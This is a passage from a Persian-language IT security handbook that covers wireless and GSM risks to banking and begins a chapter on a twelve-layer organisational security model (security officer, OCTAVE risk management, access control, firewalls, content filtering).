ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮ ،ﺳﻴﻤﻬﺎﻱ ﻣﺴﻲ ،ﻣﺎﻫﻮﺍﺭﻩ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻲﺳـﻴﻢ
ﺯﻣﻴﻨﻲ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻭﺍﺳﻄﻬﺎﻱ ﻫﻮﺍﻳﻲ
ﻳﻜــﻲ ﺍﺯ ﻣﺜﺎﻟﻬــﺎﻱ ﻣﺨــﺎﺑﺮﺍﺕ ﻣــﺪﺭﻥ ﻭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻓﻨــﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﻳﻚ ﺭﺍﻩﺣﻞ ﻣﻤﻜﻦ ،ﺑﺎﺯﻧﮕﺮﻱ ﺩﺭ ﻣﺪﻝ ﻫﻔﺖﻻﻳـﻪﺍﻱ ﻣﺨـﺎﺑﺮﺍﺕ
ISOﻭ ﺑﻄﻮﺭ ﺧﺎﺹ ﺍﻳﺠﺎﺩ ﻳـﻚ ﻻﻳـﺔ ﺟﺪﻳـﺪ -ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ
ﺍﻣﻨﻴﺖ ﻻﺯﻡ ﺑﺮ ﻣﺒﻨﺎﻱ ﻳﻚ ﻛﺪ ۲۵۶ﻳﺎ ﺣﺘـﻲ ۱۰۲۴ﺑﻴﺘـﻲ ﻛـﻪ
ﻗﺎﺑﻞ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺎﺷﺪ -ﺍﺳـﺖ .ﺍﻳﻨﻜـﻪ ﺭﺍﻩﺣـﻞ ﻧﻬـﺎﻳﻲ ﺑـﺮﺍﻱ
ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺍﻳﺠﺎﺩ ﻳﻚ ﻻﻳﺔ ﺟﺪﻳﺪ ﺍﺳﺖ ﻳﺎ ﻣﻲﺗـﻮﺍﻥ
ﺍﺯ ﻣﻬﻨﺪﺳﻲ ﻣﺠﺪﺩ ﻗﺴﻤﺘﻲ ﺍﺯ ﻻﻳﻪﻫـﺎﻱ ﻓﻌﻠـﻲ ﻧﺘـﺎﻳﺞ ﺑﻬﺘـﺮﻱ
ﮔﺮﻓﺖ ﻫﻤﭽﻨﺎﻥ ﺑﻪ ﻣﻄﺎﻟﻌـﻪ ﺑﻴـﺸﺘﺮ ﻧﻴـﺎﺯ ﺩﺍﺭﺩ .ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ
ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻲﺳﻴﻢ ﻫﻤﭽﻨﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ.
ﺗﻬﺪﻳــﺪﻫﺎﻳﻲ ﻛــﻪ ﺍﺯ ﺟﺎﻧــﺐ ﭘﺮﻭﺗﻜﻠﻬــﺎﻱ 802.11ﻭ GSM
ﻣﺘﻮﺟﻪ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﺟﺎﻣﻌﻴﺖ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺪﻩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺗﺎ ﺣـﺪ
ﺯﻳﺎﺩﻱ ﻛﺎﻫﺶ ﺩﺍﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ VPNﻫـﺎ ،ﺣﻔﺎﻇـﺖ ﺍﺯ
gatewayﻫﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﻢ ﺑـﺴﻴﺎﺭ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ.
ﺍﻳﻦ ﻧﻜﺘﻪ ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﻛﻨﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ
VPNﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺩﺳﺘﺮﺳﻲ ﻣﺠﺎﺯ ،ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﻳﮕـﺮ
ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺷـﺒﻜﻪ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ .ﺑﺎﻧﻜﻬـﺎ ﻭ
ﺷﺮﻛﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺑـﻪ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺳـﺎﺯ ﻭ ﻛﺎﺭﻫـﺎﻱ
ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﻄﺢ gatewayﻫﺎ ﺍﻗﺪﺍﻡ ﻛﻨﻨﺪ.
ﺑﻪ ﻣﻮﺍﺯﺍﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺭﻭﺯﺍﻓﺰﻭﻥ ﺗﺠـﺎﺭﺕ ﻭ ﺍﻗﺘـﺼﺎﺩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ
ﻳﻜﭙﺎﺭﭼﻪ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮ ،ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ
181 Pelton Merge
ﺳﻴﺎﺭ ﺣﻴﺎﺗﻲﺗﺮ ﻣﻲ ﺷﻮﺩ .ﺳﺎﺯﮔﺎﺭﻱ ﺭﻭﺯﺍﻓﺰﻭﻥ ﻧﻬﺎﺩﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ
ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻭ ﻓﻨﺎﻭﺭﻱ GSMﺑﺎﻋـﺚ ﺗـﻀﻌﻴﻒ
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺭﻳﺎﻓﺖ ﻭ ﭘﺮﺩﺍﺧـﺖ ﺷـﺪﻩ ،ﻭ ﺍﻳـﻦ ﺩﺭﺣـﺎﻟﻲ
ﺍﺳــﺖ ﻛــﻪ ﺍﻳــﻦ ﻭﺍﺳــﻄﻬﺎﻱ ﻧﻔﻮﺫﭘــﺬﻳﺮ ﺍﺳﺎﺳ ـﹰﺎ ﺑــﺮﺍﻱ ﺗﺒــﺎﺩﻝ
ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﺑﻮﺩﻧـﺪ .ﺩﺭ ﻫﻤﺎﻧﺤـﺎﻝ ﻛـﻪ
ﮔﺮﺍﻳﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑـﺪ" ،ﻣـﺪﻳﺮﻳﺖ
ﺶﺭﻭ ﺑﺮﺍﻱ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ
ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ" ﻧﻴﺰ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﭘﻴ ﹺ
ﺍﻫﻤﻴﺖ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺧﻮﺍﻫﺪ ﻳﺎﻓﺖ.
ﺑﺨﺶ ﺳﻮﻡ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻠﺘﻦ ﻣﺮﺝ ١٨١ﺍﺷﺎﺭﻩ ﻛﺮﺩﻩ" ،ﺍﻳﻦ ﮔـﺮﺍﻳﺶ ﺑـﺎﺯﺍﺭ ﺑـﻪ
ﺗﺪﺍﻭﻡ ﺍﺭﺗﻘﺎﻱ ﻛﻴﻔﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻳﻜﭙﺎﺭﭼﺔ ﻭﺍﺳﻂﻫﺎ ﺑـﻮﺩﻩ ﻛـﻪ
ﺍﻣﻜﺎﻥ ﺍﺗﺼﺎﻝ ﺑﻲﻋﻴﺐ ﻭ ﻧﻘﺺ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﻣﺜـﻞ ﻓﻴﺒـﺮ،
ﺳﻴﻤﻬﺎﻱ ﻣﺴﻲ ،ﺑﻲ ﺳﻴﻢ ﺯﻣﻴﻨﻲ ،ﻣـﺎﻫﻮﺍﺭﻩ ﻭ ﺩﻳﮕـﺮ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ
ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ ،ﺍﻣﺎ ﭼﺎﻟﺶ ﺁﻧﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳـﺪ ﻛـﻪ
ﺑﺨﻮﺍﻫﻴﻢ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺗﻬﻴﻪ ﻛﻨﻴﻢ ﻛﻪ ﺩﺭ ﻋﻴﻦ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ
ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺳﺎﺩﻩ ﻣﻴﺎﻥ ﺍﻳﻦ ﻓﻨﺎﻭﺭﻳﻬﺎ ،ﺍﻣﻨﻴﺖ ﺭﺍ ﻧﻴـﺰ ﻓـﺮﺍﻫﻢ
ﻛﻨﺪ".
١٩٥
١٩٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ:
ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ:
ﺍﻳﺠﺎﺩ ﻓﺮﻫﻨﮓ ﺍﻣﻨﻴﺖ
ﻛﻠﻴﺎﺕ
ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻧﻮﻋﻲ ﻓﺮﺁﻳﻨـﺪ ﺩﻭﻭﺟﻬـﻲ
ﺩﺍﻧﺴﺖ .ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﺔ ﺁﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺍﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﺳـﻪ
ﻗﺴﻤﺖ ﻋﻤﺪﻩ ﻣﻲ ﺑﺎﺷﺪ :ﺷﻨﺎﺳﺎﺋﻲ ﻭ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺭﺍﺋﻴﻬﺎ ،ﺗﺠﺰﻳـﻪ
ﻭ ﺗﺤﻠﻴﻞ ﻭ ﺗﻌﻴـﻴﻦ ﺍﺭﺯﺵ ﻫﺮﻳـﻚ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬـﺎ ،ﻭ ﺗﻌﻴـﻴﻦ ﺍﻳﻨﻜـﻪ
ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﺑﻪ ﺗﺮﺗﻴﺐ ﺍﻭﻟﻮﻳﺖ ﭼﻘﺪﺭ ﺣﻴﺎﺗﻲ ﻫﺴﺘﻨﺪ .ﮔـﺎﻡ
ﺩﻭﻡ ﺍﻣﻨﻴﺖ ،ﺗﺪﻭﻳﻦ ﻳﻚ ﺷﻴﻮﻩ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺍﺳـﺖ.
ﻗﺴﻤﺘﻬﺎﻱ ﻋﻤﺪﺓ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺗـﺪﻭﻳﻦ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻱ ،ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ )ﺍﻋـﻢ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻭ
ﻣﺸﺘﺮﻳﺎﻥ( ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﻭ ﻛﻨﺘـﺮﻝ ﻛﻴﻔﻴـﺖ.
ﻳﻚ ﻧﻈﺮﻳﺔ ﻣﻌﻘﻮﻝ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ" :ﺑﭙﺬﻳﺮ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻫﺪﻑ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻱ؛ ﻭ ﺑﺮﺍﻱ ﻧﺠﺎﺕ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻦ".
ﺳﻪ ﺍﺻﻞ ﻛﻠﻲ ﻛﻪ ﺩﺭ ﺗﺪﻭﻳﻦ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ ﻣـﺪﻧﻈﺮ
ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺑﻌﺒﺎﺭﺕ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
•
•
•
ﺣﻤﻼﺕ ﻭ ﺁﺳﻴﺒﻬﺎ ﺍﺟﺘﻨﺎﺏﻧﺎﭘﺬﻳﺮﻧﺪ؛
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﺮﺁﻳﻨﺪﻱ ﺯﻣﺎﻧﮕﻴﺮ ﺍﺳﺖ؛ ﻭ
ﻳﻚ ﺷﺒﻜﻪ ،ﺣﺪﺍﻛﺜﺮ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺿﻌﻴﻔﺘﺮﻳﻦ ﺟﺰﺀ ﺧﻮﺩ ،ﺍﻳﻤﻦ
ﺍﺳﺖ.
ﺑﺮﺍﻱ ﺣﻔﻆ ﺟﺎﻣﻌﻴﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻂﻫﺎﻱ ﺑـﺎ
ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ ،ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ؛
ﻭ ﻃﺒﻖ ﺗﺠﺮﺑﻪ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺻﺤﻴﺢ ﻫﻴﭽﻴـﻚ
ﺍﺯ ﺍﻳﻦ ﻻﻳﻪﻫﺎ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ.
.۱
ﻣﺴﺌﻮﻝ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ -ﺍﻳﺠﺎﺩ ﺳـﻤﺖ ﻣـﺪﻳﺮﻳﺖ
ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺍﺯ ﺗﻮﺟﻪ ﺑـﻪ ﻳـﺎﺯﺩﻩ ﻻﻳـﺔ ﺩﻳﮕـﺮ ﺩﺭ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻭ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺻـﺤﻴﺢ ﺁﻧﻬـﺎ ﻃﺒـﻖ
١٨٣
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺯﻳﺮ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﻛﻨﺪ.
۱۸۲ﻣﻨﺒﻊ:
Glaessner, Thomas, Kellerman, Tom,
McNevin, "Electronic Security: Risk Mitigation
in Financial Transactions - Public Policy
Issues", June 2002, The World Bank
۱۸۳ﺑــﺮﺍﻱ ﺟﺰﺋﻴــﺎﺕ ﺑﻴــﺸﺘﺮ ﺑــﻪ ﻛﺘــﺎﺏ ﺯﻳــﺮ ﻧﻮﺷــﺘﺔ ،Glaessner
،Kellermanﻭ McNevinﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
"Electronics Security: Risk Mitigation in
"Financial Transaction
ﺑﺨﺶ ﺳﻮﻡ
ﺗﺎ ﺍﻳﻨﺠـﺎﻱ ﺑﺨـﺶ ﺳـﻮﻡ ﻧﻘـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﻛﺎﺭﻛﺮﺩﻫـﺎﻱ ﺁﻥ ﺩﺭ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺍﻋـﻢ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ،
ﻣﺆﺳﺴﺎﺕ ﻏﻴﺮ ﺍﻧﺘﻔـﺎﻋﻲ ،ﺁﻣﻮﺯﺷـﮕﺎﻫﻬﺎ ،ﻭ ﺍﺩﺍﺭﺍﺕ ﺩﻭﻟﺘـﻲ ﻣـﻮﺭﺩ
ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺖ .ﺩﺭ ﺑﺤﺜﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭ ﺍﻣﻨﻴـﺖ
ﺳﺎﺯﻣﺎﻧﻲ ﺗﺄﻛﻴﺪ ﺷﺪ ﻛﻪ ﻳﻜﻨﻔﺮ ﺑﺎﻳﺪ ﻧﻘﺶ ﺭﻫﺒﺮ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺑﮕﻴﺮﺩ
ﻭﻟﻲ ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﮔﺬﺍﺷﺘﻪ ﻧﺸﺪ ﻛﻪ ﺍﻳـﻦ ﻓـﺮﺩ ﺩﺭ ﻳـﻚ ﺟﺎﻳﮕـﺎﻩ
ﺍﻧﺤﺼﺎﺭﻱ ﺳﺎﺯﻣﺎﻥ ﻣﺜﻞ "ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ" ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ
)ﺑﻪ ﺍﺳﺘﺜﻨﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮒ( .ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ ﻣﺘﻮﺳـﻂ
ﻻ ﺍﺯ ﻧﻈﺮ ﺑﻮﺩﺟﻪ ﻭ ﺗﻌﺪﺍﺩ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑـﺎ ﻣﺤـﺪﻭﺩﻳﺖ ﻣﻮﺍﺟـﻪ
ﻣﻌﻤﻮ ﹰ
ﻫﺴﺘﻴﻢ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻨﺪﺭﺕ ﺑﺘﻮﺍﻥ ﺍﺯ ﻳﻜﻨﻔﺮ ﺑﻌﻨـﻮﺍﻥ
ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺖ ﻳﺎ ﻛﺎﺭﺷﻨﺎﺱ ﺗﻤﺎﻡ ﻭﻗﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻬﺮﻩ ﮔﺮﻓـﺖ.
ﺑﺎ ﺍﻳﻦ ﻫﻤﻪ ،ﻫﺮ ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﻣـﺮﺗﺒﻂ ﺍﺳـﺖ
ﺑﺎﻳﺪ ﻳﻚ ﻓﺮﺩ ﻳﺎ ﺣـﺪﺍﻛﺜﺮ ﻳـﻚ ﮔـﺮﻭﻩ ﻛﻮﭼـﻚ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﻬﺮﻩﮔﻴﺮﻱ ﺍﺯ ﺁﻳـﻴﻦﻧﺎﻣـﻪﻫـﺎﻱ
ﻳﻜﭙﺎﺭﭼﻪ ،ﺭﻋﺎﻳـﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻨﺎﺳـﺐ ﺩﺭ ﺗﻬﻴـﺔ ﮔﺰﺍﺭﺷـﻬﺎ،
ﺑﺮﻗﺮﺍﺭﻱ ﺭﻭﺍﺑﻂ ﻫﻮﺷﻴﺎﺭﺍﻧﻪ ﻭ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﺩﻭﺳـﺘﺎﻧﻪ ﺑـﺎ ﺳـﺎﻳﺮ
ﻛﺎﺭﻣﻨﺪﺍﻥ ،ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﺧﺎﺭﺟﻲ ،ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ،ﻭ ﻣﺸﺘﺮﻳﺎﻥ ،ﻫﻤﻪ ﻭ
ﻫﻤﻪ ﻋﻮﺍﻣﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﮔـﺮﻭﻩ ﻭ ﻳـﺎ ﺷـﺨﺺ
ﺧﺎﺹ ﺩﺭ ﺍﺟﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳـﺎﺯﻣﺎﻥ ﻛﻤـﻚ ﻧﻤﺎﻳﻨـﺪ.
ﺍﻳــﻦ ﻓــﺼﻞ ﭘﻴــﺸﻨﻬﺎﺩﺍﺗﻲ ﻣــﺸﺮﻭﺡ ﺩﺭﺑــﺎﺭﺓ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺍﻣﻨﻴــﺖ
ﭼﻨﺪﻻﻳﻪ ﻣﻄﺮﺡ ﻣﻲﻛﻨﺪ ،ﻭ ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪﺍﻱ
ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ .ﺑﺪﻧﺒﺎﻝ ﺁﻥ ،ﻣﻨﺘﺨﺒـﻲ ﺍﺯ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﻛﻨﺘـﺮﻝ
ﺍﻣﻨﻴﺘﻲ ﺁﻣﺪﻩ ﻛﻪ ﺑﺎ ﻳﺎﺩﺁﻭﺭﻱ ﻭﻇﺎﻳﻒ ﺭﻭﺯﺍﻧﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﺍﻋـﻀﺎﻱ
ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﻗﺒﺎﻝ ﺍﻳﻤﻨﻲ ﺳﺎﺯﻣﺎﻥ ،ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺪﺷﻪﺩﺍﺭ
ﺷﺪﻥ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ.
١٨٢
١٩٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
.۲
ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ -ﻳﻚ ﻣﻔﻬﻮﻡ ﻭﺳﻴﻊ ﺑﺮ ﻣﺒﻨـﺎﻱ
ﺍﻟﮕــﻮﻱ - OCTAVEﻣﺘﻌﻠــﻖ ﺑــﻪ - CERTﺑــﺮﺍﻱ
ﻣﺪﻳﺮﻳﺖ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ.
.۳
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ -ﺑﺮﺭﺳﻲ
ﻣﺠﺎﺯ ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﻛﺎﺭﺑﺮ ﭘﻴﺶ ﺍﺯ ﺍﻋﻄﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ﺩﺭﺧﻮﺍﺳﺘﻲ .ﺩﺭ ﻃﻮﻝ ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ،ﻛـﺎﺭﺑﺮ ﻳـﻚ
ﻧﺎﻡ ﻳﺎ ﺷﻤﺎﺭﻩ ﺣﺴﺎﺏ )ﺩﺍﺩﺓ ﻣﻌﺮﻓﻲ( ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺭﻣﺰ ﻋﺒﻮﺭ
)ﺩﺍﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ( ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣـﻲﻛﻨـﺪ .ﻛﻨﺘﺮﻟﻬـﺎﻱ
ﺩﺳﺘﺮﺳﻲ ﺍﻭﻟﻴﻦ ﺧـﻂ ﺗـﺪﺍﻓﻌﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲ ﺁﻳﻨـﺪ ﻭ
ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑــﺮ ﺍﺳــﺎﺱ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ،ﻧــﺸﺎﻧﻬﺎ،
ﻣﺸﺨﺼﻪﻫﺎﻱ ﺯﻳﺴﺘﻲ ،ﻭ ﻳـﺎ ﺯﻳﺮﺳـﺎﺧﺖ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ
ﺑﺎﺷﻨﺪ.
.۴
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ -ﺍﻳﺠﺎﺩ ﻳﻚ ﺳﻴﺴﺘﻢ ﻭ ﻳﺎ ﺗﺮﻛﻴﺒـﻲ
ﺍﺯ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﻛﻪ ﻣﻴﺎﻥ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﺷﺒﻜﻪ ،ﻣﺮﺯ ﻣﺸﺨﺺ
ﻛﻨﺪ.
.۵
ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍ ﺑﺼﻮﺭﺕ ﻓﻌـﺎﻝ -ﺩﺭ ﺳـﻄﺢ
ﻣﺮﻭﺭﮔﺮﻫـﺎﻱ ﻭﺏ ،ﻻﺯﻡ ﺍﺳــﺖ ﻫـﺮ ﺁﻧﭽــﻪ ﻛـﻪ ﻣﻨﺎﺳــﺐ
